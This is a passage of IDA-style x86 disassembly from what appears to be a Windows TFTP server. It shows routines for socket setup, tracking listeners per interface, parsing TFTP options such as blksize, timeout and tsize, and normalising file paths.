push dword ptr [esp+8]
call sub_1001A91
xor eax, eax
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001DEB proc near ; DATA XREF: sub_1001665+6�o
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
call ds:dword_10010A4
inc dword_1006134
pop ecx
lea eax, [ebp+var_4]
push eax
call ds:dword_10010B8
mov eax, [ebp+arg_0]
pop ecx
dec eax
jz short loc_1001E68
dec eax
jz short loc_1001E35
dec eax
jz short loc_1001E1D
dec eax
dec eax
jz short loc_1001E68
jmp short loc_1001E4B
; ---------------------------------------------------------------------------
loc_1001E1D: ; CODE XREF: sub_1001DEB+2A�j
push dword_1006040
call ds:dword_1001034
mov dword_1006124, 4
jmp short loc_1001E4B
; ---------------------------------------------------------------------------
loc_1001E35: ; CODE XREF: sub_1001DEB+27�j
push dword_1006040
call ds:dword_1001074
mov dword_1006124, 7
loc_1001E4B: ; CODE XREF: sub_1001DEB+30�j
; sub_1001DEB+48�j
push offset dword_1006120
push dword_1006044
call ds:dword_1001014
test eax, eax
jnz short locret_1001E6F
call ds:dword_1001038
jmp short locret_1001E6F
; ---------------------------------------------------------------------------
loc_1001E68: ; CODE XREF: sub_1001DEB+24�j
; sub_1001DEB+2E�j
push 0
call sub_1001E73
locret_1001E6F: ; CODE XREF: sub_1001DEB+73�j
; sub_1001DEB+7B�j
leave
retn 4
sub_1001DEB endp
; =============== S U B R O U T I N E =======================================
sub_1001E73 proc near ; CODE XREF: sub_1001665+B9�p
; sub_1001DEB+7F�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, ds:dword_1001014
push edi
mov edi, offset dword_1006120
push edi
mov dword_1006124, 3
push dword_1006044
call esi ; dword_1001014
mov ebp, ds:dword_1001038
xor ebx, ebx
cmp eax, ebx
jnz short loc_1001EA3
call ebp ; dword_1001038
loc_1001EA3: ; CODE XREF: sub_1001E73+2C�j
push dword_1005DDC
call ds:dword_1001030
mov dword_1006124, 1
mov dword_1006134, ebx
mov eax, [esp+10h+arg_0]
mov dword_1006138, ebx
cmp eax, ebx
jnz short loc_1001EDB
mov dword_100612C, ebx
mov dword_1006130, ebx
jmp short loc_1001EFD
; ---------------------------------------------------------------------------
loc_1001EDB: ; CODE XREF: sub_1001E73+58�j
cmp eax, 834h
jb short loc_1001EF3
cmp eax, 16A7h
mov dword_100612C, 42Ah
jbe short loc_1001EF8
loc_1001EF3: ; CODE XREF: sub_1001E73+6D�j
mov dword_100612C, eax
loc_1001EF8: ; CODE XREF: sub_1001E73+7E�j
mov dword_1006130, eax
loc_1001EFD: ; CODE XREF: sub_1001E73+66�j
push edi
push dword_1006044
call esi ; dword_1001014
cmp eax, ebx
jnz short loc_1001F0C
call ebp ; dword_1001038
loc_1001F0C: ; CODE XREF: sub_1001E73+95�j
mov eax, dword_1005DE0
mov esi, ds:dword_1001054
cmp eax, ebx
jz short loc_1001F24
push eax
call esi ; dword_1001054
mov dword_1005DE0, ebx
loc_1001F24: ; CODE XREF: sub_1001E73+A6�j
mov eax, dword_1005DDC
cmp eax, ebx
jz short loc_1001F36
push eax
call esi ; dword_1001054
mov dword_1005DDC, ebx
loc_1001F36: ; CODE XREF: sub_1001E73+B8�j
mov eax, dword_1005DD0
cmp eax, ebx
jz short loc_1001F4D
push eax
call ds:dword_100109C
pop ecx
mov dword_1005DD0, ebx
loc_1001F4D: ; CODE XREF: sub_1001E73+CA�j
pop edi
pop esi
pop ebp
pop ebx
retn 4
sub_1001E73 endp
; =============== S U B R O U T I N E =======================================
sub_1001F54 proc near ; CODE XREF: sub_1002182+1C�p
; sub_1002219+B7�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0FFFFFFFFh
push dword ptr [esi+10h]
call ds:dword_1001168
push dword ptr [esi+8]
call ds:dword_100111C
push dword ptr [esi+14h]
call ds:dword_1001118
mov eax, [esi]
mov ecx, [esi+4]
cmp eax, ecx
jnz short loc_1001F90
mov eax, dword_1006038
mov ecx, [eax]
mov eax, [eax+4]
mov [eax], ecx
mov [ecx+4], eax
jmp short loc_1001F9A
; ---------------------------------------------------------------------------
loc_1001F90: ; CODE XREF: sub_1001F54+29�j
mov [ecx], eax
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
loc_1001F9A: ; CODE XREF: sub_1001F54+3A�j
push esi
call ds:dword_10010A0
pop ecx
pop esi
retn 4
sub_1001F54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001FA6 proc near ; CODE XREF: sub_10018DB+3D�p
; sub_1002219+1D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_4]
push edi
push eax
push edi
mov [ebp+var_4], edi
mov [ebp+var_8], 0C0000017h
mov [ebx], edi
call sub_1003A4A
cmp eax, edi
jz short loc_1001FD3
cmp eax, 7Ah
jnz short loc_100201A
loc_1001FD3: ; CODE XREF: sub_1001FA6+26�j
push [ebp+var_4]
call ds:dword_1001094
mov esi, eax
pop ecx
cmp esi, edi
jz short loc_100201A
loc_1001FE3: ; CODE XREF: sub_1001FA6+63�j
lea eax, [ebp+var_4]
push edi
push eax
push esi
call sub_1003A4A
cmp eax, edi
jz short loc_1002015
cmp eax, 7Ah
jnz short loc_100201A
push [ebp+var_4]
push esi
call ds:dword_1001098
pop ecx
cmp eax, edi
pop ecx
jz short loc_100200B
mov esi, eax
jmp short loc_1001FE3
; ---------------------------------------------------------------------------
loc_100200B: ; CODE XREF: sub_1001FA6+5F�j
push esi
call ds:dword_10010A0
pop ecx
jmp short loc_100201A
; ---------------------------------------------------------------------------
loc_1002015: ; CODE XREF: sub_1001FA6+4A�j
mov [ebp+var_8], edi
mov [ebx], esi
loc_100201A: ; CODE XREF: sub_1001FA6+2B�j
; sub_1001FA6+3B�j ...
mov eax, [ebp+var_8]
pop edi
pop esi
pop ebx
leave
retn 4
sub_1001FA6 endp
; =============== S U B R O U T I N E =======================================
sub_1002024 proc near ; CODE XREF: sub_100205A+B7�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_0]
call ds:dword_1001120
test eax, eax
jz short locret_1002057
push edi
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
push esi
mov eax, ecx
mov esi, edi
mov edi, [esp+8+arg_4]
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop esi
pop edi
locret_1002057: ; CODE XREF: sub_1002024+C�j
retn 8
sub_1002024 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100205A proc near ; CODE XREF: sub_10018DB+64�p
; sub_1002219+65�p ...
var_28 = byte ptr -28h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
xor esi, esi
push edi
mov [ebp+var_4], esi
loc_1002068: ; CODE XREF: sub_100205A+5D�j
push 1
push esi
push esi
push esi
push 2
push 2
call ds:dword_10010F4
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_100209D
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
push offset aUdp ; "udp"
push offset aTftp ; "tftp"
stosd
call ds:dword_1001128
cmp eax, esi
jnz short loc_10020B9
jmp short loc_10020B1
; ---------------------------------------------------------------------------
loc_100209D: ; CODE XREF: sub_100205A+22�j
call ds:dword_10010F8
push 2EEh
call ds:dword_100106C
inc [ebp+var_4]
loc_10020B1: ; CODE XREF: sub_100205A+41�j
cmp [ebp+var_4], 0Ah
jge short loc_10020E6
jmp short loc_1002068
; ---------------------------------------------------------------------------
loc_10020B9: ; CODE XREF: sub_100205A+3F�j
mov [ebp+var_14], 2
mov ax, [eax+8]
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
lea eax, [ebp+var_14]
push 10h
push eax
push ebx
call ds:dword_1001124
test eax, eax
jz short loc_10020E6
call ds:dword_1001038
jmp short loc_100215E
; ---------------------------------------------------------------------------
loc_10020E6: ; CODE XREF: sub_100205A+5B�j
; sub_100205A+82�j
cmp ebx, 0FFFFFFFFh
jz short loc_100215E
push 20h
call ds:dword_1001094
mov esi, eax
pop ecx
test esi, esi
jz short loc_100213D
push 8
xor eax, eax
pop ecx
mov edi, esi
rep stosd
mov eax, [ebp+arg_0]
lea ecx, [ebp+var_28]
push ecx
push eax
mov [esi+8], ebx
mov [esi+0Ch], eax
call sub_1002024
xor eax, eax
push eax
push eax
push eax
push eax
call ds:dword_1001040
mov edi, eax
test edi, edi
jz short loc_1002140
push 1
push edi
push ebx
mov [esi+14h], edi
call sub_100188E
test eax, eax
mov [esi+10h], eax
jnz short loc_1002162
jmp short loc_1002140
; ---------------------------------------------------------------------------
loc_100213D: ; CODE XREF: sub_100205A+9E�j
mov edi, [ebp+arg_0]
loc_1002140: ; CODE XREF: sub_100205A+CC�j
; sub_100205A+E1�j
push ebx
call ds:dword_100111C
test edi, edi
jz short loc_1002152
push edi
call ds:dword_1001054
loc_1002152: ; CODE XREF: sub_100205A+EF�j
test esi, esi
jz short loc_100215E
push esi
call ds:dword_10010A0
pop ecx
loc_100215E: ; CODE XREF: sub_100205A+8A�j
; sub_100205A+8F�j ...
xor eax, eax
jmp short loc_100217B
; ---------------------------------------------------------------------------
loc_1002162: ; CODE XREF: sub_100205A+DF�j
mov eax, dword_1006038
mov dword ptr [esi+4], offset dword_1006038
mov [esi], eax
mov [eax+4], esi
mov dword_1006038, esi
mov eax, esi
loc_100217B: ; CODE XREF: sub_100205A+106�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_100205A endp
; =============== S U B R O U T I N E =======================================
sub_1002182 proc near ; CODE XREF: sub_1002219:loc_1002298�p
mov ecx, dword_1006038
push esi
mov esi, offset dword_1006038
xor eax, eax
cmp ecx, esi
jz short loc_10021B3
push edi
loc_1002195: ; CODE XREF: sub_1002182+2E�j
cmp dword ptr [ecx+18h], 0
mov edi, [ecx]
jnz short loc_10021A8
push ecx
call sub_1001F54
push 1
pop eax
jmp short loc_10021AC
; ---------------------------------------------------------------------------
loc_10021A8: ; CODE XREF: sub_1002182+19�j
and dword ptr [ecx+18h], 0
loc_10021AC: ; CODE XREF: sub_1002182+24�j
cmp edi, esi
mov ecx, edi
jnz short loc_1002195
pop edi
loc_10021B3: ; CODE XREF: sub_1002182+10�j
pop esi
retn
sub_1002182 endp
; =============== S U B R O U T I N E =======================================
sub_10021B5 proc near ; CODE XREF: sub_1002219+43�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
push esi
mov ecx, offset dword_1006038
and dword ptr [edx], 0
mov eax, dword_1006038
loc_10021C7: ; CODE XREF: sub_10021B5+21�j
cmp eax, ecx
jz short loc_10021DF
mov esi, [eax+0Ch]
cmp esi, [esp+4+arg_0]
jz short loc_10021D8
mov eax, [eax]
jmp short loc_10021C7
; ---------------------------------------------------------------------------
loc_10021D8: ; CODE XREF: sub_10021B5+1D�j
push 1
mov [edx], eax
pop eax
jmp short loc_10021E1
; ---------------------------------------------------------------------------
loc_10021DF: ; CODE XREF: sub_10021B5+14�j
xor eax, eax
loc_10021E1: ; CODE XREF: sub_10021B5+28�j
pop esi
retn 8
sub_10021B5 endp
; =============== S U B R O U T I N E =======================================
sub_10021E5 proc near ; CODE XREF: .text:01001DB0�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
push esi
mov ecx, offset dword_1006038
and dword ptr [edx], 0
mov eax, dword_1006038
loc_10021F7: ; CODE XREF: sub_10021E5+21�j
cmp eax, ecx
jz short loc_100220A
mov esi, [eax+8]
cmp esi, [esp+4+arg_0]
jz short loc_1002208
mov eax, [eax]
jmp short loc_10021F7
; ---------------------------------------------------------------------------
loc_1002208: ; CODE XREF: sub_10021E5+1D�j
mov [edx], eax
loc_100220A: ; CODE XREF: sub_10021E5+14�j
mov eax, [edx]
pop esi
neg eax
sbb eax, eax
and al, 0A9h
add eax, 57h
retn 8
sub_10021E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002219 proc near ; DATA XREF: sub_10018DB+CB�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
xor esi, esi
push offset dword_1006020
mov [ebp+var_C], esi
call ds:dword_1001058
lea eax, [ebp+var_4]
push eax
call sub_1001FA6
test eax, eax
jnz short loc_10022A9
mov eax, [ebp+var_4]
xor ebx, ebx
cmp [eax], esi
jbe short loc_1002298
loc_1002248: ; CODE XREF: sub_1002219+7D�j
mov eax, [eax+esi+4]
test eax, eax
jz short loc_100228D
cmp eax, 100007Fh
jz short loc_100228D
lea ecx, [ebp+var_8]
push ecx
push eax
call sub_10021B5
test eax, eax
jz short loc_1002271
mov eax, [ebp+var_8]
mov dword ptr [eax+18h], 1
jmp short loc_100228D
; ---------------------------------------------------------------------------
loc_1002271: ; CODE XREF: sub_1002219+4A�j
mov eax, [ebp+var_4]
push 1
pop edi
push dword ptr [eax+esi+4]
mov [ebp+var_C], edi
call sub_100205A
test eax, eax
mov [ebp+var_8], eax
jz short loc_100228D
mov [eax+18h], edi
loc_100228D: ; CODE XREF: sub_1002219+35�j
; sub_1002219+3C�j ...
mov eax, [ebp+var_4]
inc ebx
add esi, 18h
cmp ebx, [eax]
jb short loc_1002248
loc_1002298: ; CODE XREF: sub_1002219+2D�j
call sub_1002182
push [ebp+var_4]
mov esi, eax
call ds:dword_10010A0
pop ecx
loc_10022A9: ; CODE XREF: sub_1002219+24�j
cmp [ebp+var_C], 0
jnz short loc_10022E9
test esi, esi
jnz short loc_10022E9
mov eax, dword_1006038
mov edi, offset dword_1006038
cmp eax, edi
jz short loc_10022E9
loc_10022C1: ; CODE XREF: sub_1002219+CE�j
mov [ebp+var_8], eax
mov ebx, [eax]
test byte ptr [eax+1Ch], 1
jnz short loc_10022E3
mov esi, [eax+0Ch]
push eax
call sub_1001F54
push esi
call sub_100205A
test eax, eax
jz short loc_10022E3
or dword ptr [eax+1Ch], 1
loc_10022E3: ; CODE XREF: sub_1002219+B1�j
; sub_1002219+C4�j
cmp ebx, edi
mov eax, ebx
jnz short loc_10022C1
loc_10022E9: ; CODE XREF: sub_1002219+94�j
; sub_1002219+98�j ...
push offset dword_1006100
push offset dword_1005E00
call sub_1003A44
push offset dword_1006020
call ds:dword_100104C
pop edi
pop esi
pop ebx
leave
retn 8
sub_1002219 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100230A proc near ; CODE XREF: sub_1001A91+242�p
; sub_10023D8+23C�p ...
var_FFBC = word ptr -0FFBCh
var_FFBA = word ptr -0FFBAh
var_FFB8 = byte ptr -0FFB8h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 0FFBCh
call sub_1003A3E
push ebx
push esi
mov esi, ds:dword_1001104
push edi
push 5
call esi ; dword_1001104
mov edi, [ebp+arg_C]
mov [ebp+var_FFBC], ax
push edi
call esi ; dword_1001104
cmp [ebp+arg_10], 0
mov [ebp+var_FFBA], ax
jz short loc_1002369
mov edi, [ebp+arg_10]
or ecx, 0FFFFFFFFh
xor eax, eax
lea edx, [ebp+var_FFB8]
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, [ebp+arg_10]
jmp short loc_10023A2
; ---------------------------------------------------------------------------
loc_1002369: ; CODE XREF: sub_100230A+32�j
cmp di, 9
jb short loc_1002371
xor edi, edi
loc_1002371: ; CODE XREF: sub_100230A+63�j
movzx eax, di
or ecx, 0FFFFFFFFh
lea ebx, [ebp+var_FFB8]
mov edx, off_1005CC0[eax*4]
xor eax, eax
mov edi, edx
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, edx
loc_10023A2: ; CODE XREF: sub_100230A+5D�j
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
push 10h
push [ebp+arg_0]
not ecx
dec ecx
push eax
add ecx, 5
lea eax, [ebp+var_FFBC]
push ecx
push eax
push [ebp+arg_8]
call ds:dword_1001130
cmp eax, 0FFFFFFFFh
jnz short loc_10023D1
call ds:dword_10010F8
loc_10023D1: ; CODE XREF: sub_100230A+BF�j
pop edi
pop esi
pop ebx
leave
retn 14h
sub_100230A endp
; =============== S U B R O U T I N E =======================================
sub_10023D8 proc near ; CODE XREF: sub_1002F31+302�p
; sub_100333A+26D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov eax, [esp+arg_0]
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_10]
mov dword ptr [eax+20h], 200h
mov dword ptr [eax+28h], 0Ah
mov eax, [esp+0Ch+arg_14]
push edi
mov ecx, 3FEFh
and dword ptr [eax], 0
xor eax, eax
mov edi, esi
push 6
rep stosd
call ds:dword_1001104
mov [esi], ax
lea ebx, [esi+2]
mov ebp, [esp+10h+arg_4]
cmp byte ptr [ebp+0], 0
jz loc_10025E4
loc_1002420: ; CODE XREF: sub_10023D8+202�j
mov esi, ds:dword_100115C
push offset aBlksize ; "blksize"
push ebp
call esi ; dword_100115C
pop ecx
test eax, eax
pop ecx
jnz short loc_1002498
mov edi, ebp
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
push 8
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop esi
add ebp, esi
add ebx, esi
push ebp
call ds:dword_1001160
pop ecx
cmp eax, esi
mov ecx, [esp+10h+arg_0]
mov [ecx+20h], eax
jb loc_10025FD
cmp eax, 0FFB8h
ja loc_10025FD
cmp eax, 5B0h
jnz short loc_100248F
mov dword ptr [ecx+20h], 200h
sub ebx, esi
jmp loc_10025C6
; ---------------------------------------------------------------------------
loc_100248F: ; CODE XREF: sub_10023D8+A7�j
push 0Ah
push ebx
push eax
jmp loc_1002597
; ---------------------------------------------------------------------------
loc_1002498: ; CODE XREF: sub_10023D8+5A�j
push offset aTimeout_0 ; "timeout"
push ebp
call esi ; dword_100115C
pop ecx
test eax, eax
pop ecx
jnz short loc_100251A
mov edi, ebp
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
add ebp, 8
mov eax, ecx
mov esi, edi
mov edi, ebx
push ebp
shr ecx, 2
rep movsd
mov ecx, eax
add ebx, 8
and ecx, 3
rep movsb
call ds:dword_1001160
pop ecx
mov ecx, [esp+10h+arg_0]
push 1
pop edx
cmp eax, edx
mov [ecx+28h], eax
jl loc_1002602
cmp eax, 0FFh
jg loc_1002602
mov eax, [esp+10h+arg_14]
mov edi, ebp
or ecx, 0FFFFFFFFh
mov [eax], edx
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, ebp
jmp loc_10025A2
; ---------------------------------------------------------------------------
loc_100251A: ; CODE XREF: sub_10023D8+CC�j
push offset aTsize ; "tsize"
push ebp
call esi ; dword_100115C
pop ecx
mov edi, ebp
test eax, eax
pop ecx
jnz loc_10025B2
or edx, 0FFFFFFFFh
xor eax, eax
mov ecx, edx
add ebp, 6
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
add ebx, 6
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
cmp [esp+10h+arg_8], 2
rep movsb
jnz short loc_100258D
mov edi, ebp
mov ecx, edx
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
rep movsb
mov edi, ebp
mov ecx, edx
repne scasb
not ecx
dec ecx
mov edi, ebp
lea ebx, [ebx+ecx+1]
mov ecx, edx
jmp short loc_10025CB
; ---------------------------------------------------------------------------
loc_100258D: ; CODE XREF: sub_10023D8+180�j
mov eax, [esp+10h+arg_0]
push 0Ah
push ebx
push dword ptr [eax+24h]
loc_1002597: ; CODE XREF: sub_10023D8+BB�j
call ds:dword_1001164
add esp, 0Ch
mov edi, ebx
loc_10025A2: ; CODE XREF: sub_10023D8+13D�j
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
lea ebx, [ebx+ecx+1]
jmp short loc_10025C6
; ---------------------------------------------------------------------------
loc_10025B2: ; CODE XREF: sub_10023D8+150�j
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
cmp [ebp+ecx+1], al
lea ebp, [ebp+ecx+1]
jz short loc_10025E0
loc_10025C6: ; CODE XREF: sub_10023D8+B2�j
; sub_10023D8+1D8�j
mov edi, ebp
or ecx, 0FFFFFFFFh
loc_10025CB: ; CODE XREF: sub_10023D8+1B3�j
xor eax, eax
repne scasb
not ecx
dec ecx
cmp [ebp+ecx+1], al
lea ebp, [ebp+ecx+1]
jnz loc_1002420
loc_10025E0: ; CODE XREF: sub_10023D8+1EC�j
mov esi, [esp+10h+arg_10]
loc_10025E4: ; CODE XREF: sub_10023D8+42�j
mov eax, [esp+10h+arg_C]
sub ebx, esi
cmp ebx, 2
mov [eax], ebx
jnz short loc_10025F4
and dword ptr [eax], 0
loc_10025F4: ; CODE XREF: sub_10023D8+217�j
xor eax, eax
loc_10025F6: ; CODE XREF: sub_10023D8+244�j
pop edi
pop esi
pop ebp
pop ebx
retn 18h
; ---------------------------------------------------------------------------
loc_10025FD: ; CODE XREF: sub_10023D8+91�j
; sub_10023D8+9C�j
push 0
push esi
jmp short loc_1002606
; ---------------------------------------------------------------------------
loc_1002602: ; CODE XREF: sub_10023D8+105�j
; sub_10023D8+110�j
push 0
push 8
loc_1002606: ; CODE XREF: sub_10023D8+228�j
push dword ptr [ecx+8]
lea eax, [ecx+0FFF1h]
add ecx, 0Ch
push eax
push ecx
call sub_100230A
or eax, 0FFFFFFFFh
jmp short loc_10025F6
sub_10023D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100261E proc near ; CODE XREF: sub_1002F31+130�p
; sub_100333A+150�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov al, [ebx]
mov ecx, ebx
mov esi, ebx
mov [ebp+arg_0], ebx
loc_1002630: ; CODE XREF: sub_100261E+22�j
test al, al
jz short loc_1002642
cmp al, 5Ch
jz short loc_100263C
cmp al, 2Fh
jnz short loc_1002642
loc_100263C: ; CODE XREF: sub_100261E+18�j
mov al, [ecx+1]
inc ecx
jmp short loc_1002630
; ---------------------------------------------------------------------------
loc_1002642: ; CODE XREF: sub_100261E+14�j
; sub_100261E+1C�j ...
mov al, [ecx]
test al, al
jz loc_10026E4
cmp al, 2Eh
jnz loc_100271C
mov dl, [ecx+1]
lea edi, [ecx+1]
cmp dl, 5Ch
jz loc_1002718
cmp dl, 2Fh
jz loc_1002718
cmp dl, al
jnz loc_1002703
mov dl, [ecx+2]
lea edi, [ecx+2]
cmp dl, 5Ch
jz short loc_1002684
cmp dl, 2Fh
jnz short loc_1002703
loc_1002684: ; CODE XREF: sub_100261E+5F�j
dec esi
mov ecx, edi
dec esi
cmp esi, ebx
jbe short loc_10026E0
loc_100268C: ; CODE XREF: sub_100261E+7B�j
mov al, [esi]
cmp al, 5Ch
jz short loc_100269B
cmp al, 2Fh
jz short loc_100269B
dec esi
cmp esi, ebx
jnb short loc_100268C
loc_100269B: ; CODE XREF: sub_100261E+72�j
; sub_100261E+76�j
inc esi
loc_100269C: ; CODE XREF: sub_100261E+8E�j
; sub_100261E+EE�j ...
cmp esi, [ebp+arg_0]
jbe short loc_10026AE
cmp byte ptr [esi-1], 20h
lea eax, [esi-1]
jnz short loc_10026AE
mov esi, eax
jmp short loc_100269C
; ---------------------------------------------------------------------------
loc_10026AE: ; CODE XREF: sub_100261E+81�j
; sub_100261E+8A�j
mov al, [ecx]
cmp al, 5Ch
jz short loc_10026B8
cmp al, 2Fh
jnz short loc_1002642
loc_10026B8: ; CODE XREF: sub_100261E+94�j
cmp esi, ebx
jz short loc_10026CB
mov al, [esi-1]
cmp al, 5Ch
jz short loc_10026CB
cmp al, 2Fh
jz short loc_10026CB
mov byte ptr [esi], 5Ch
inc esi
loc_10026CB: ; CODE XREF: sub_100261E+9C�j
; sub_100261E+A3�j ...
inc ecx
jz short loc_10026D8
mov al, [ecx]
cmp al, 5Ch
jz short loc_10026CB
cmp al, 2Fh
jz short loc_10026CB
loc_10026D8: ; CODE XREF: sub_100261E+AE�j
mov [ebp+arg_0], esi
jmp loc_1002642
; ---------------------------------------------------------------------------
loc_10026E0: ; CODE XREF: sub_100261E+6C�j
xor eax, eax
jmp short loc_10026FC
; ---------------------------------------------------------------------------
loc_10026E4: ; CODE XREF: sub_100261E+28�j
mov cl, [esi-1]
lea eax, [esi-1]
cmp cl, 5Ch
jz short loc_10026F4
cmp cl, 2Fh
jnz short loc_10026F6
loc_10026F4: ; CODE XREF: sub_100261E+CF�j
mov esi, eax
loc_10026F6: ; CODE XREF: sub_100261E+D4�j
and byte ptr [esi], 0
push 1
pop eax
loc_10026FC: ; CODE XREF: sub_100261E+C4�j
pop edi
pop esi
pop ebx
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_1002703: ; CODE XREF: sub_100261E+50�j
; sub_100261E+64�j ...
mov [esi], al
mov al, [ecx+1]
inc esi
inc ecx
test al, al
jz short loc_100269C
cmp al, 5Ch
jz short loc_100269C
cmp al, 2Fh
jnz short loc_1002703
jmp short loc_100269C
; ---------------------------------------------------------------------------
loc_1002718: ; CODE XREF: sub_100261E+3F�j
; sub_100261E+48�j
mov ecx, edi
jmp short loc_100269C
; ---------------------------------------------------------------------------
loc_100271C: ; CODE XREF: sub_100261E+30�j
; sub_100261E+11D�j
test al, al
jz loc_100269C
cmp al, 5Ch
jz loc_100269C
cmp al, 2Fh
jz loc_100269C
mov [esi], al
mov al, [ecx+1]
inc esi
inc ecx
jmp short loc_100271C
sub_100261E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100273D proc near ; CODE XREF: sub_1002F31+18C�p
; sub_100333A+197�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
mov edx, [ebp+arg_0]
repne scasb
not ecx
dec ecx
mov edi, edx
mov ebx, ecx
or ecx, 0FFFFFFFFh
repne scasb
not ecx
dec ecx
cmp byte ptr [ebx+esi-1], 5Ch
mov edi, ecx
setz al
xor ecx, ecx
cmp byte ptr [edx], 5Ch
setz cl
test eax, eax
jnz short loc_1002784
test ecx, ecx
jnz short loc_1002784
mov [ebp+arg_8], 1
jmp short loc_1002791
; ---------------------------------------------------------------------------
loc_1002784: ; CODE XREF: sub_100273D+38�j
; sub_100273D+3C�j
and [ebp+arg_8], 0
test eax, eax
jz short loc_1002791
test ecx, ecx
jz short loc_1002791
dec ebx
loc_1002791: ; CODE XREF: sub_100273D+45�j
; sub_100273D+4D�j ...
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
add eax, edi
add eax, ebx
dec ecx
cmp eax, ecx
jbe short loc_10027A4
xor eax, eax
jmp short loc_10027DA
; ---------------------------------------------------------------------------
loc_10027A4: ; CODE XREF: sub_100273D+61�j
mov eax, [ebp+arg_8]
inc edi
add eax, ebx
push edi
add eax, edx
push edx
push eax
call ds:dword_1001144
mov eax, [ebp+arg_0]
mov ecx, ebx
mov edx, ecx
mov edi, eax
shr ecx, 2
rep movsd
mov ecx, edx
add esp, 0Ch
and ecx, 3
cmp [ebp+arg_8], 0
rep movsb
jz short loc_10027D7
mov byte ptr [ebx+eax], 5Ch
loc_10027D7: ; CODE XREF: sub_100273D+94�j
push 1
pop eax
loc_10027DA: ; CODE XREF: sub_100273D+65�j
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_100273D endp
; =============== S U B R O U T I N E =======================================
sub_10027E1 proc near ; CODE XREF: sub_1002B5E+C7�p
; sub_1002F31+36B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov ecx, [esi+10024h]
lea eax, [esi+10024h]
test ecx, ecx
jz short loc_1002817
and dword ptr [eax], 0
mov eax, [esp+8+arg_4]
and word ptr [esi+10014h], 0
mov [esi+10020h], ecx
mov eax, [eax+20h]
mov [esi+1001Ch], eax
jmp short loc_1002877
; ---------------------------------------------------------------------------
loc_1002817: ; CODE XREF: sub_10027E1+14�j
mov edi, ds:dword_1001104
push 3
call edi ; dword_1001104
mov [esi+38h], ax
mov ax, [esi+10014h]
push eax
call edi ; dword_1001104
mov [esi+3Ah], ax
mov eax, [esp+8+arg_4]
push dword ptr [eax+20h]
lea eax, [esi+3Ch]
push eax
push dword ptr [esi+1002Ch]
call ds:dword_1001090
